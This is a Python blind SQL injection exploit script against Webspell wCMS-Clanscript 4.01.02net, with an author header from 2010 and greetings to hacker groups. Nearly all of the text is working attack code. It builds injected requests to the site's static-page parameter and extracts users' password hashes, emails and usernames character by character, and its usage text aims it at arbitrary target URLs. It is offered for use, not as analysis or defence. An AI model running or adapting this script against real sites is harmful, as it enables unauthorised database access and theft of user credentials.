#----------------------------Information------------------------------------------------ #+Autor : Easy Laster #+ICQ : 11-051-551 #+Date : 29.09.2010 #+Script : Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit #+Price : $00,00 #+Language :PHP #+Discovered by Easy Laster #+code by Dr.ChAoS #+Security Group Undergroundagents,Free-hack and 4004-Security-Project #+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, #Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, #N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco, #and all member from free-hack.com. #--------------------------------------------------------------------------------------- #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, getopt def out(str): sys.stdout.write(str) sys.stdout.flush() def read_url(url): while True: try: src = urllib2.urlopen(url).read() break except: pass return src class Exploit: charset = "0123456789abcdefABCDEF" url = "" charn = 1 id = 1 table_prefix = "webs_" table_field = "" passwd = "" columns = [] find_passwd = True def __init__(self): if len(sys.argv) < 2: print "*****************************************************************************" print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*" print "*****************************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* coded by Dr.ChAoS *" print "*****************************************************************************" print "* Usage: *" print "* python exploit.py [OPTION...] [SWITCH...] *" print "* *" print "* Example: *" print "* *" print "* Get the password of the user with id 2: *" print "* python exploit.py --id 2 http://site.de/path/ *" print "* *" print "* Get email, username and password of id 1: *" print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *" print "* *" print "* Switches: *" print "* --nopw Search no password *" print "* *" print "* Options: *" print "* --id User id *" print "* --prefix Table prefix of ECP *" print "* --charn <1 - 32, default = 1> Start at position x *" print "* --columns Get value of any column you want *" print "*****************************************************************************" exit() opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"]) for opt in opts: if opt[0] == "--id": self.id = int(opt[1]) elif opt[0] == "--prefix": self.table_prefix = opt[1] elif opt[0] == "--charn": self.charn = int(opt[1]) elif opt[0] == "--columns": for col in opt[1].split(","): max, charx, name = col.split(":") self.columns.append([int(max), int(charx), name, ""]) elif opt[0] == "--nopw": self.find_passwd = False for switch in switches: if switch[:4] == "http": if switch[-1:] == "/": self.url = switch else: self.url = switch + "/" def valid_page(self, src): if "http://www.wookie.de/images/baustelle.gif" not in src: return True else: return False def generate_url(self, ascii): return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+" def start(self): print "Exploiting..." if self.find_passwd: charx = self.charn self.password() if len(self.columns) > 0: self.read_columns() print "All finished!\n" print "------ Results ------" if len(self.columns) > 0: for v in self.columns: print "Column \"" + v[2] + "\": " + v[3] if self.find_passwd: if len(self.passwd) == 32 - charx + 1: print "Password: " + self.passwd else: print "Password not found!" print "---------------------" def read_columns(self): end = False charrange = [0] charrange.extend(range(32, 256)) for i in range(len(self.columns)): out("Getting value of \"" + self.columns[i][2] + "\": ") self.table_field = self.columns[i][2] self.charn = self.columns[i][1] for pwc in range(self.charn, self.columns[i][0] + 1): if end == True: break self.charn = pwc end = False for c in charrange: src = read_url(self.generate_url(chr(c))) if self.valid_page(src): if c == 0: end = True else: self.columns[i][3] += chr(c) out(chr(c)) break out("\n") def password(self): out("Getting password: ") self.table_field = "password" for pwc in range(self.charn, 33): self.charn = pwc for c in self.charset: src = read_url(self.generate_url(c)) if self.valid_page(src): self.passwd += c out(c) break out("\n") exploit = Exploit() exploit.start()